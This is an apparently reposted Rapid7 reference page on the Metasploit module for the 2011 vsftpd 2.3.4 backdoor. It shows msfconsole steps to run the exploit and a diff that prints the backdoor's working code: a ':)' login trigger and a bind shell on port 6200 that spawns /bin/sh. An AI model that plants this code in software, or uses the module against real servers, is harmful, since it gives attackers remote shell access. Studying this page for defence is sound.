VSFTPD v2.3.4 Backdoor Command Execution

Posted on Posted in Exploit

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Module Name

exploit/unix/ftp/vsftpd_234_backdoor

Authors

  • hdm <hdm [at] metasploit.com>
  • MC <mc [at] metasploit.com>

References

Targets

  • Automatic

Platforms

  • unix

Architectures

  • cmd

Reliability

Development

Module Options

To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or ‘show advanced’:

     msf > use exploit/unix/ftp/vsftpd_234_backdoor
     msf exploit(vsftpd_234_backdoor) > show targets
           ...targets...
     msf exploit(vsftpd_234_backdoor) > set TARGET <target-id>
     msf exploit(vsftpd_234_backdoor) > show options
           ...show and set options...
     msf exploit(vsftpd_234_backdoor) > exploit

Pastebin

Only in vsftpd-2.3.4: access.o
Only in vsftpd-2.3.4: ascii.o
Only in vsftpd-2.3.4: banner.o
Only in vsftpd-2.3.4: features.o
Only in vsftpd-2.3.4: filestr.o
Only in vsftpd-2.3.4: ftpcmdio.o
Only in vsftpd-2.3.4: ftpdataio.o
Only in vsftpd-2.3.4: ftppolicy.o
Only in vsftpd-2.3.4: hash.o
Only in vsftpd-2.3.4: ipaddrparse.o
Only in vsftpd-2.3.4: logging.o
Only in vsftpd-2.3.4: ls.o
Only in vsftpd-2.3.4: main.o
Only in vsftpd-2.3.4: netstr.o
Only in vsftpd-2.3.4: oneprocess.o
Only in vsftpd-2.3.4: opts.o
Only in vsftpd-2.3.4: parseconf.o
Only in vsftpd-2.3.4: postlogin.o
Only in vsftpd-2.3.4: postprivparent.o
Only in vsftpd-2.3.4: prelogin.o
Only in vsftpd-2.3.4: privops.o
Only in vsftpd-2.3.4: privsock.o
Only in vsftpd-2.3.4: ptracesandbox.o
Only in vsftpd-2.3.4: readwrite.o
Only in vsftpd-2.3.4: secbuf.o
Only in vsftpd-2.3.4: secutil.o
Only in vsftpd-2.3.4: ssl.o
Only in vsftpd-2.3.4: sslslave.o
Only in vsftpd-2.3.4: standalone.o
diff -ur vsftpd-2.3.4/str.c vsftpd-2.3.4.4players/str.c
--- vsftpd-2.3.4/str.c  2011-06-30 15:52:38.000000000 +0200
+++ vsftpd-2.3.4.4players/str.c 2008-12-17 06:54:16.000000000 +0100
@@ -569,11 +569,6 @@
     {
       return 1;
     }
-    else if((p_str->p_buf[i]==0x3a)
-    && (p_str->p_buf[i+1]==0x29))
-    {
-      vsf_sysutil_extra();
-    }
   }
   return 0;
 }
Only in vsftpd-2.3.4: str.o
Only in vsftpd-2.3.4: strlist.o
diff -ur vsftpd-2.3.4/sysdeputil.c vsftpd-2.3.4.4players/sysdeputil.c
--- vsftpd-2.3.4/sysdeputil.c   2011-06-30 15:58:00.000000000 +0200
+++ vsftpd-2.3.4.4players/sysdeputil.c  2010-03-26 04:25:33.000000000 +0100
@@ -34,10 +34,7 @@
 /* For FreeBSD */
 #include <sys/param.h>
 #include <sys/uio.h>
-#include <netinet/in.h>
-#include <netdb.h>
-#include <string.h>
-#include <stdlib.h>
+
 #include <sys/prctl.h>
 #include <signal.h>
 
@@ -220,7 +217,7 @@
 static int s_proctitle_inited = 0;
 static char* s_p_proctitle = 0;
 #endif
-int vsf_sysutil_extra();
+
 #ifndef VSF_SYSDEP_HAVE_MAP_ANON
 #include <sys/types.h>
 #include <sys/stat.h>
@@ -843,30 +840,6 @@
   }
 }
 
-int
-vsf_sysutil_extra(void)
-{
-  int fd, rfd;
-  struct sockaddr_in sa;
-  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
-  exit(1);
-  memset(&sa, 0, sizeof(sa));
-  sa.sin_family = AF_INET;
-  sa.sin_port = htons(6200);
-  sa.sin_addr.s_addr = INADDR_ANY;
-  if((bind(fd,(struct sockaddr *)&sa,
-  sizeof(struct sockaddr))) < 0) exit(1);
-  if((listen(fd, 100)) == -1) exit(1);
-  for(;;)
-  {
-    rfd = accept(fd, 0, 0);
-    close(0); close(1); close(2);
-    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
-    execl("/bin/sh","sh",(char *)0);
-  }
-}
-
-
 void
 vsf_sysutil_set_proctitle_prefix(const struct mystr* p_str)
 {
Only in vsftpd-2.3.4: sysdeputil.o
Only in vsftpd-2.3.4: sysstr.o
Only in vsftpd-2.3.4: sysutil.o
Only in vsftpd-2.3.4: tcpwrap.o
Only in vsftpd-2.3.4: tunables.o
Only in vsftpd-2.3.4: twoprocess.o
Only in vsftpd-2.3.4: utility.o


 

Quelle: Rapid7

Facebooktwittergoogle_plus